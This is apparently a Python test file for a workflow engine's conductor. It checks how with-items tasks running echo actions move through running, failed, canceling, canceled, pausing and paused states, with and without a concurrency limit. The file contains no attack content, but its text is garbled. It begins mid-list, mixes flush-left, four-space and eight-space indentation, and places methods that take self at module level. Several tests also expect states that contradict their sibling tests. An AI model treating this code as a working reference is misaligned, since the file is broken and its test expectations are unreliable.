{'action': 'core.echo', 'input': {'message': 'foobar'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fubar'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'marcopolo'}, 'item_id': 2},
]
mock_ac_ex_states = [states.SUCCEEDED] * 3
expected_task_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
expected_workflow_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
[i[0] + i[1] for i in zip(task_ctx['xs'], task_ctx['ys'])],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow succeeded.
self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
    def test_multiple_items_list_with_concurrency(self):
        # Same zipped items list as test_multiple_items_list but with the
        # with-items concurrency restricted to one.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - foo
              - fu
              - marco
          - ys:
              - bar
              - bar
              - polo

        tasks:
          task1:
            with:
              items: x, y in <% zip(ctx(xs), ctx(ys)) %>
              concurrency: 1
            action: core.echo message=<% item(x) + item(y) %>
        """

        concurrency = 1

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['foo', 'fu', 'marco'], 'ys': ['bar', 'bar', 'polo']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'foobar'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fubar'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'marcopolo'}, 'item_id': 2},
        ]

        mock_ac_ex_states = [states.SUCCEEDED] * 3
        expected_task_states = [states.RUNNING] * 2 + [states.SUCCEEDED]
        expected_workflow_states = [states.RUNNING] * 2 + [states.SUCCEEDED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            [i[0] + i[1] for i in zip(task_ctx['xs'], task_ctx['ys'])],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states,
            concurrency=concurrency
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow succeeded.
        self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_failed_item_task_dormant(self):
wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
"""
spec = specs.WorkflowSpec(wf_def)
self.assertDictEqual(spec.inspect(), {})
conductor = conducting.WorkflowConductor(spec)
conductor.request_workflow_state(states.RUNNING)
# Mock the action execution for each item and assert expected task states.
task_name = 'task1'
task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}
task_action_specs = [
{'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
{'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
{'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
{'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
]
mock_ac_ex_states = [states.SUCCEEDED, states.FAILED]
expected_task_states = [states.RUNNING, states.FAILED]
expected_workflow_states = [states.RUNNING, states.FAILED]
self.assert_task_items(
conductor,
task_name,
task_ctx,
task_ctx['xs'],
task_action_specs,
mock_ac_ex_states,
expected_task_states,
expected_workflow_states
)
# Assert the task is removed from staging.
self.assertNotIn(task_name, conductor.flow.staged)
# Assert the workflow failed.
self.assertEqual(conductor.get_workflow_state(), states.FAILED)
    def test_failed_item_task_active(self):
        # One item fails while the other items are still active; the task
        # only transitions to failed after all items complete.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
        """

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # The second item fails but the remaining items still run to
        # completion before the task settles into the failed state.
        mock_ac_ex_states = [states.SUCCEEDED, states.FAILED, states.SUCCEEDED, states.SUCCEEDED]
        expected_task_states = [states.RUNNING] * 3 + [states.FAILED]
        expected_workflow_states = [states.RUNNING] * 3 + [states.FAILED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow failed.
        self.assertEqual(conductor.get_workflow_state(), states.FAILED)
    def test_failed_item_task_dormant_with_concurrency(self):
        # An item failure with concurrency enabled and the remaining items
        # not yet dispatched fails the task and the workflow.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with:
              items: <% ctx(xs) %>
              concurrency: 2
            action: core.echo message=<% item() %>
        """

        concurrency = 2

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # Only the first batch of items is mocked; the second item fails.
        mock_ac_ex_states = [states.SUCCEEDED, states.FAILED]
        expected_task_states = [states.RUNNING, states.FAILED]
        expected_workflow_states = [states.RUNNING, states.FAILED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states,
            concurrency=concurrency
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow failed.
        self.assertEqual(conductor.get_workflow_state(), states.FAILED)
    def test_failed_item_task_active_with_concurrency(self):
        # An item failure with concurrency enabled while other items are
        # still active; the task fails only after all items complete.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with:
              items: <% ctx(xs) %>
              concurrency: 2
            action: core.echo message=<% item() %>
        """

        concurrency = 2

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # The second item fails but all four items run to completion before
        # the task settles into the failed state.
        mock_ac_ex_states = [states.SUCCEEDED, states.FAILED, states.SUCCEEDED, states.SUCCEEDED]
        expected_task_states = [states.RUNNING] * 3 + [states.FAILED]
        expected_workflow_states = [states.RUNNING] * 3 + [states.FAILED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states,
            concurrency=concurrency
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow failed.
        self.assertEqual(conductor.get_workflow_state(), states.FAILED)
    def test_cancel_item(self):
        # One item is canceled mid-run; the task transitions through
        # canceling while the remaining items finish, then lands on canceled.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        mock_ac_ex_states = [states.SUCCEEDED, states.CANCELED, states.SUCCEEDED, states.SUCCEEDED]
        expected_task_states = [states.RUNNING] + [states.CANCELING] * 2 + [states.CANCELED]
        expected_workflow_states = [states.RUNNING] + [states.CANCELING] * 2 + [states.CANCELED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow is canceled.
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
    def test_cancel_with_items_incomplete(self):
        # An item is canceled before the last item runs; only three item
        # executions are mocked, leaving the items list incomplete.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        mock_ac_ex_states = [states.SUCCEEDED, states.CANCELED, states.SUCCEEDED]
        expected_task_states = [states.RUNNING, states.CANCELING, states.CANCELED]
        expected_workflow_states = [states.RUNNING, states.CANCELING, states.CANCELED]

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states
        )

        # Assert the task is removed from staging.
        self.assertNotIn(task_name, conductor.flow.staged)

        # Assert the workflow is canceled.
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
    def test_cancel_workflow_using_canceling_state_with_items_active(self):
        # Request CANCELING on the workflow while all items are actively
        # running, then let the items complete and verify the final states.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # Verify the set of action executions.
        expected_task = self.format_task_item(
            task_name,
            task_ctx,
            conductor.spec.tasks.get_task(task_name),
            action_specs=task_action_specs,
            items_count=len(task_ctx['xs'])
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(actual_tasks, expected_tasks)

        # Set the items to running state.
        for i in range(0, len(task_ctx['xs'])):
            context = {'item_id': i}
            ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
            conductor.update_task_flow(task_name, ac_ex_event)

        # Assert that the task is running.
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)

        # Cancel the workflow; the task is expected to follow into canceling.
        conductor.request_workflow_state(states.CANCELING)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELING)

        # Complete the items.
        for i in range(0, len(task_ctx['xs'])):
            context = {'item_id': i}
            result = task_ctx['xs'][i]
            ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
            conductor.update_task_flow(task_name, ac_ex_event)

        # Assert the task is completed and workflow is canceled.
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
    def test_cancel_workflow_using_canceled_state_with_items_active(self):
        # Request CANCELED (instead of CANCELING) while items are active;
        # the conductor is expected to report canceling until the items finish.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # Verify the set of action executions.
        expected_task = self.format_task_item(
            task_name,
            task_ctx,
            conductor.spec.tasks.get_task(task_name),
            action_specs=task_action_specs,
            items_count=len(task_ctx['xs'])
        )

        expected_tasks = [expected_task]
        actual_tasks = conductor.get_next_tasks()
        self.assert_task_list(actual_tasks, expected_tasks)

        # Set the items to running state.
        for i in range(0, len(task_ctx['xs'])):
            context = {'item_id': i}
            ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context=context)
            conductor.update_task_flow(task_name, ac_ex_event)

        # Assert that the task is running.
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)

        # Cancel the workflow. Even though CANCELED is requested, the active
        # items keep the workflow and the task in the canceling state.
        conductor.request_workflow_state(states.CANCELED)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELING)

        # Complete the items.
        for i in range(0, len(task_ctx['xs'])):
            context = {'item_id': i}
            result = task_ctx['xs'][i]
            ac_ex_event = events.ActionExecutionEvent(states.SUCCEEDED, result, context=context)
            conductor.update_task_flow(task_name, ac_ex_event)

        # Assert the task is completed and workflow is canceled.
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
    def test_cancel_workflow_using_canceling_state_with_items_concurrency(self):
        # With concurrency 2, complete the first batch of items, then request
        # CANCELING while the remaining items are still staged.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with:
              items: <% ctx(xs) %>
              concurrency: 2
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        concurrency = 2

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # Only the first two items (one concurrency batch) are mocked.
        mock_ac_ex_states = [states.SUCCEEDED] * 2
        expected_task_states = [states.RUNNING] * 2
        expected_workflow_states = [states.RUNNING] * 2

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states,
            concurrency=concurrency
        )

        # Assert the task is not removed from staging.
        self.assertIn(task_name, conductor.flow.staged)

        # Assert the workflow is still running.
        self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

        # Cancel the workflow. With no items in flight, the cancelation is
        # expected to complete immediately.
        conductor.request_workflow_state(states.CANCELING)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELED)
    def test_cancel_workflow_using_canceled_state_with_items_concurrency(self):
        # Same as the canceling-state variant above but requesting the
        # CANCELED state directly; the outcome is the same.
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with:
              items: <% ctx(xs) %>
              concurrency: 2
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        concurrency = 2

        spec = specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_state(states.RUNNING)

        # Mock the action execution for each item and assert expected task states.
        task_name = 'task1'
        task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

        task_action_specs = [
            {'action': 'core.echo', 'input': {'message': 'fee'}, 'item_id': 0},
            {'action': 'core.echo', 'input': {'message': 'fi'}, 'item_id': 1},
            {'action': 'core.echo', 'input': {'message': 'fo'}, 'item_id': 2},
            {'action': 'core.echo', 'input': {'message': 'fum'}, 'item_id': 3},
        ]

        # Only the first two items (one concurrency batch) are mocked.
        mock_ac_ex_states = [states.SUCCEEDED] * 2
        expected_task_states = [states.RUNNING] * 2
        expected_workflow_states = [states.RUNNING] * 2

        self.assert_task_items(
            conductor,
            task_name,
            task_ctx,
            task_ctx['xs'],
            task_action_specs,
            mock_ac_ex_states,
            expected_task_states,
            expected_workflow_states,
            concurrency=concurrency
        )

        # Assert the task is not removed from staging.
        self.assertIn(task_name, conductor.flow.staged)

        # Assert the workflow is still running.
        self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

        # Cancel the workflow. With no items in flight, the cancelation is
        # expected to complete immediately.
        conductor.request_workflow_state(states.CANCELED)
        self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
        self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELED)
def test_cancel_workflow_with_items_concurrency_and_active(self):
    """Cancel a with-items task (concurrency=2) while items are still active."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with:
          items: <% ctx(xs) %>
          concurrency: 2
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    concurrency = 2
    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Verify the first batch of action executions (bounded by concurrency).
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs[0:concurrency],
        items_count=len(task_ctx['xs']),
        items_concurrency=concurrency
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set the first batch of items to running state.
    for item_id in range(concurrency):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # The task should now be running.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)

    # Request cancelation; with items in flight the workflow goes to CANCELING.
    conductor.request_workflow_state(states.CANCELING)
    self.assertEqual(conductor.get_workflow_state(), states.CANCELING)
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELING)

    # Complete the in-flight items.
    for item_id in range(concurrency):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # Once all active items finish, the task and workflow settle to CANCELED.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.CANCELED)
    self.assertEqual(conductor.get_workflow_state(), states.CANCELED)
def test_pause_item(self):
    """A single PAUSED item pauses the with-items task and then the workflow."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Item 1 pauses; the task transitions PAUSING until all items settle, then PAUSED.
    mock_ac_ex_states = [states.SUCCEEDED, states.PAUSED, states.SUCCEEDED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
    expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # The task remains staged since one of the items did not complete.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should be paused.
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_resume_paused_item(self):
    """Resuming a paused item resumes the task and completes the workflow."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    mock_ac_ex_states = [states.SUCCEEDED, states.PAUSED, states.SUCCEEDED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
    expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # The task remains staged since one of the items did not complete.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should be paused.
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    # Resume the paused action execution for item 1.
    ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context={'item_id': 1})
    conductor.update_task_flow(task_name, ac_ex_event)

    # Both the task and the workflow should be running again.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
    self.assertEqual(conductor.flow.staged[task_name]['items'][1]['state'], states.RUNNING)
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Complete the resumed action execution.
    ac_ex_event = events.ActionExecutionEvent(
        states.SUCCEEDED, result=task_ctx['xs'][1], context={'item_id': 1})
    conductor.update_task_flow(task_name, ac_ex_event)

    # All items are done, so the task is removed from staging.
    self.assertNotIn(task_name, conductor.flow.staged)

    # Both the task and the workflow succeeded.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_pausing_state_with_items_active(self):
    """Request PAUSING while all items are active; workflow pauses after items finish."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Verify the full set of action executions (no concurrency limit).
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs,
        items_count=len(task_ctx['xs'])
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set every item to running state.
    for item_id in range(len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # The task should now be running.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)

    # Request a graceful pause while items are in flight.
    conductor.request_workflow_state(states.PAUSING)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSING)

    # Complete all items.
    for item_id in range(len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # The task completed, but the workflow honors the pause request.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    # Resuming finds no remaining work, so the workflow completes.
    conductor.request_workflow_state(states.RESUMING)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_paused_state_with_items_active(self):
    """Request PAUSED while items are active; conductor downgrades to PAUSING."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Verify the full set of action executions (no concurrency limit).
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs,
        items_count=len(task_ctx['xs'])
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set every item to running state.
    for item_id in range(len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # The task should now be running.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)

    # Request PAUSED; because items are still active, the state becomes PAUSING.
    conductor.request_workflow_state(states.PAUSED)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSING)

    # Complete all items.
